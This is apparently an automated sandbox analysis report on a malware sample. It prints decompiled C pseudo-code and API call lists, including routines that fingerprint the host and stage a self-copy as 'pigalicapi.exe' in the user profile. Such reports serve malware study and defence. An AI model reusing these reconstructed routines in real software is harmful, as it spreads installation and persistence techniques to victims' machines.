                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomFindMutex$ChangeCloseCreateNotificationObjectReleaseSingleWaitfreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID: aaaa$aaaa$aaaa$aaaa$aaaa$aaaa$aaaa
                                                                                                                                                                                                                                                                                                        • API String ID: 3507070773-3683700703
                                                                                                                                                                                                                                                                                                        • Opcode ID: d61ac55fb7e6056a8369cbc7b453f13adbe996a2e49b94902fd9d61e9f0cc443
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8522d72e3f7aa3cec7441999860715555553f08e688ef583daf8eacf07a88261
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d61ac55fb7e6056a8369cbc7b453f13adbe996a2e49b94902fd9d61e9f0cc443
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91517BB85083428FC710AF2AC48A26EBBF0FF84301F01896EE8859B391D778D555CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                                        			E04004020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                                                                        				long _v48;
                                                                                                                                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                                                                                                                                        				void _v56;
                                                                                                                                                                                                                                                                                                        				long _v60;
                                                                                                                                                                                                                                                                                                        				HANDLE* _v64;
                                                                                                                                                                                                                                                                                                        				void* _v68;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                                                                                                                                                        				void* _v76;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                                                                                                                                                        				void _v92;
                                                                                                                                                                                                                                                                                                        				long _v96;
                                                                                                                                                                                                                                                                                                        				signed int _v100;
                                                                                                                                                                                                                                                                                                        				HANDLE* _v104;
                                                                                                                                                                                                                                                                                                        				HANDLE* _v108;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                                                                                                                                        				void* _t188;
                                                                                                                                                                                                                                                                                                        				void* _t189;
                                                                                                                                                                                                                                                                                                        				void* _t191;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                                                                        					E04007D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                                                                        					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                                                                        					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        					_v16 = _a24;
                                                                                                                                                                                                                                                                                                        					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                                                                                                                                                        					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                                                                        					_v60 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v60 < _a16) {
                                                                                                                                                                                                                                                                                                        						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        						if(_v52 != 0) {
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							_v52 = 0;
                                                                                                                                                                                                                                                                                                        							_v48 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t198 = _v56;
                                                                                                                                                                                                                                                                                                        						if(_v56 != 0) {
                                                                                                                                                                                                                                                                                                        							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                                                        							_v56 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						ResetEvent(_v20);
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        						_t114 = CreateThread(0, 0, E04004AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        						_v56 = _t114;
                                                                                                                                                                                                                                                                                                        						_v104 = E040097A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                                                                        						_v64 = _v104;
                                                                                                                                                                                                                                                                                                        						E04007D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                                                                        						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                                                                        						_v100 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v100 < _a20) {
                                                                                                                                                                                                                                                                                                        							_v64[_v100] = 0;
                                                                                                                                                                                                                                                                                                        							E04007D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                                                                        							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                                                                        							_v68 =  &_v56;
                                                                                                                                                                                                                                                                                                        							_v72 = _a12;
                                                                                                                                                                                                                                                                                                        							_v92 = _a4;
                                                                                                                                                                                                                                                                                                        							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                                                                        							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                                                                        								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                                        							_t141 = CreateThread(0, 0,  &M04004BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                                                                        							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                                                                        							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                                                                        							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                                                                        						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                                                                        						if(_v96 == 0) {
                                                                                                                                                                                                                                                                                                        							_v5 = 1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                                                                        						if(_v96 != 0) {
                                                                                                                                                                                                                                                                                                        							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        						if(_v52 != 0) {
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v52, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        							_v52 = 0;
                                                                                                                                                                                                                                                                                                        							_v48 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        						_v108 = _v64;
                                                                                                                                                                                                                                                                                                        						E040097C0(_v108);
                                                                                                                                                                                                                                                                                                        						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                                                                        						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}




























                                                                                                                                                                                                                                                                                                        0x04004026
                                                                                                                                                                                                                                                                                                        0x0400402e
                                                                                                                                                                                                                                                                                                        0x0400405a
                                                                                                                                                                                                                                                                                                        0x0400405f
                                                                                                                                                                                                                                                                                                        0x04004066
                                                                                                                                                                                                                                                                                                        0x0400406f
                                                                                                                                                                                                                                                                                                        0x04004080
                                                                                                                                                                                                                                                                                                        0x04004086
                                                                                                                                                                                                                                                                                                        0x0400408a
                                                                                                                                                                                                                                                                                                        0x0400408d
                                                                                                                                                                                                                                                                                                        0x0400409f
                                                                                                                                                                                                                                                                                                        0x040040af
                                                                                                                                                                                                                                                                                                        0x040040b9
                                                                                                                                                                                                                                                                                                        0x040040c6
                                                                                                                                                                                                                                                                                                        0x040040cc
                                                                                                                                                                                                                                                                                                        0x040040d3
                                                                                                                                                                                                                                                                                                        0x040040d3
                                                                                                                                                                                                                                                                                                        0x040040da
                                                                                                                                                                                                                                                                                                        0x040040de
                                                                                                                                                                                                                                                                                                        0x040040e6
                                                                                                                                                                                                                                                                                                        0x040040ec
                                                                                                                                                                                                                                                                                                        0x040040ec
                                                                                                                                                                                                                                                                                                        0x040040f7
                                                                                                                                                                                                                                                                                                        0x04004101
                                                                                                                                                                                                                                                                                                        0x04004118
                                                                                                                                                                                                                                                                                                        0x0400411e
                                                                                                                                                                                                                                                                                                        0x0400413d
                                                                                                                                                                                                                                                                                                        0x04004143
                                                                                                                                                                                                                                                                                                        0x04004153
                                                                                                                                                                                                                                                                                                        0x04004158
                                                                                                                                                                                                                                                                                                        0x0400415b
                                                                                                                                                                                                                                                                                                        0x0400416d
                                                                                                                                                                                                                                                                                                        0x0400417f
                                                                                                                                                                                                                                                                                                        0x0400418e
                                                                                                                                                                                                                                                                                                        0x04004193
                                                                                                                                                                                                                                                                                                        0x04004199
                                                                                                                                                                                                                                                                                                        0x0400419f
                                                                                                                                                                                                                                                                                                        0x040041a5
                                                                                                                                                                                                                                                                                                        0x040041af
                                                                                                                                                                                                                                                                                                        0x040041bb
                                                                                                                                                                                                                                                                                                        0x040041d2
                                                                                                                                                                                                                                                                                                        0x040041bd
                                                                                                                                                                                                                                                                                                        0x040041c7
                                                                                                                                                                                                                                                                                                        0x040041c7
                                                                                                                                                                                                                                                                                                        0x040041e3
                                                                                                                                                                                                                                                                                                        0x040041f7
                                                                                                                                                                                                                                                                                                        0x04004203
                                                                                                                                                                                                                                                                                                        0x0400420c
                                                                                                                                                                                                                                                                                                        0x04004216
                                                                                                                                                                                                                                                                                                        0x0400416a
                                                                                                                                                                                                                                                                                                        0x0400416a
                                                                                                                                                                                                                                                                                                        0x0400422d
                                                                                                                                                                                                                                                                                                        0x04004242
                                                                                                                                                                                                                                                                                                        0x04004249
                                                                                                                                                                                                                                                                                                        0x0400424b
                                                                                                                                                                                                                                                                                                        0x0400424b
                                                                                                                                                                                                                                                                                                        0x0400425e
                                                                                                                                                                                                                                                                                                        0x04004265
                                                                                                                                                                                                                                                                                                        0x0400426d
                                                                                                                                                                                                                                                                                                        0x0400426d
                                                                                                                                                                                                                                                                                                        0x04004277
                                                                                                                                                                                                                                                                                                        0x04004281
                                                                                                                                                                                                                                                                                                        0x0400428e
                                                                                                                                                                                                                                                                                                        0x04004294
                                                                                                                                                                                                                                                                                                        0x0400429b
                                                                                                                                                                                                                                                                                                        0x0400429b
                                                                                                                                                                                                                                                                                                        0x040042a6
                                                                                                                                                                                                                                                                                                        0x040042af
                                                                                                                                                                                                                                                                                                        0x040042b6
                                                                                                                                                                                                                                                                                                        0x040042bb
                                                                                                                                                                                                                                                                                                        0x040042c4
                                                                                                                                                                                                                                                                                                        0x0400409c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040042c6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040042c4
                                                                                                                                                                                                                                                                                                        0x040042d1
                                                                                                                                                                                                                                                                                                        0x040042d1
                                                                                                                                                                                                                                                                                                        0x040042dd

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                                                        • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0400422D
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0400423C
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 04004258
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0400426D
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 04004277
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400428E
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 040042A6
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1593741596-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8bdf0d2272c993105e18f632bfcb20d3462f1ee8570acd5c3bdc395bff94e74a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A910D74A04208AFEB14DFA4D849BDDBBB5FB48705F108219FA05BB2C0D778A984CF55
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                                        			E04005700(CHAR* _a4) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                                                                                                                        				long _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                                                                                                                        				long _v560;
                                                                                                                                                                                                                                                                                                        				void* _v564;
                                                                                                                                                                                                                                                                                                        				long _v568;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					E04008F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                                                                        					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
                                                                                                                                                                                                                                                                                                        					E04001CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                                                                        					E04009D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                                                                        					E04007B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                                                                        					_t59 = E04005CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                                                                        					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                                                                        					E04007D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                                                                        					_v28 = 0x207;
                                                                                                                                                                                                                                                                                                        					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                                                                        					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v32 = _t67;
                                                                                                                                                                                                                                                                                                        					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                                                                        						if(_v560 > 0) {
                                                                                                                                                                                                                                                                                                        							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        							_v564 = _t71;
                                                                                                                                                                                                                                                                                                        							if(_v564 != 0) {
                                                                                                                                                                                                                                                                                                        								_v568 = 0;
                                                                                                                                                                                                                                                                                                        								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                                                                        								if(_v568 != _v560) {
                                                                                                                                                                                                                                                                                                        									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                                                                        									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CloseHandle(_v32);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v5 = 1;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                                                                        0x04005709
                                                                                                                                                                                                                                                                                                        0x04005711
                                                                                                                                                                                                                                                                                                        0x04005729
                                                                                                                                                                                                                                                                                                        0x04005742
                                                                                                                                                                                                                                                                                                        0x04005756
                                                                                                                                                                                                                                                                                                        0x0400576e
                                                                                                                                                                                                                                                                                                        0x04005786
                                                                                                                                                                                                                                                                                                        0x04005798
                                                                                                                                                                                                                                                                                                        0x040057a3
                                                                                                                                                                                                                                                                                                        0x040057b8
                                                                                                                                                                                                                                                                                                        0x040057cc
                                                                                                                                                                                                                                                                                                        0x040057d4
                                                                                                                                                                                                                                                                                                        0x040057e4
                                                                                                                                                                                                                                                                                                        0x0400580a
                                                                                                                                                                                                                                                                                                        0x040057e6
                                                                                                                                                                                                                                                                                                        0x040057f1
                                                                                                                                                                                                                                                                                                        0x040057f1
                                                                                                                                                                                                                                                                                                        0x0400582f
                                                                                                                                                                                                                                                                                                        0x04005854
                                                                                                                                                                                                                                                                                                        0x0400585a
                                                                                                                                                                                                                                                                                                        0x04005861
                                                                                                                                                                                                                                                                                                        0x04005873
                                                                                                                                                                                                                                                                                                        0x04005880
                                                                                                                                                                                                                                                                                                        0x04005896
                                                                                                                                                                                                                                                                                                        0x0400589c
                                                                                                                                                                                                                                                                                                        0x040058a9
                                                                                                                                                                                                                                                                                                        0x040058ab
                                                                                                                                                                                                                                                                                                        0x040058d0
                                                                                                                                                                                                                                                                                                        0x040058e2
                                                                                                                                                                                                                                                                                                        0x04005912
                                                                                                                                                                                                                                                                                                        0x040058e4
                                                                                                                                                                                                                                                                                                        0x040058ed
                                                                                                                                                                                                                                                                                                        0x040058fc
                                                                                                                                                                                                                                                                                                        0x040058fc
                                                                                                                                                                                                                                                                                                        0x040058e2
                                                                                                                                                                                                                                                                                                        0x040058a9
                                                                                                                                                                                                                                                                                                        0x0400591c
                                                                                                                                                                                                                                                                                                        0x0400591c
                                                                                                                                                                                                                                                                                                        0x04005922
                                                                                                                                                                                                                                                                                                        0x04005922
                                                                                                                                                                                                                                                                                                        0x0400592c

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008F80: GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008F80: GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008F80: lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008F80: lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001CA0: CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04009D20: GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04009D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04009D20: StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005CD0: lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                                                        • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 0400580A
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005896
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040058D0
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04005912
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 0400591C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
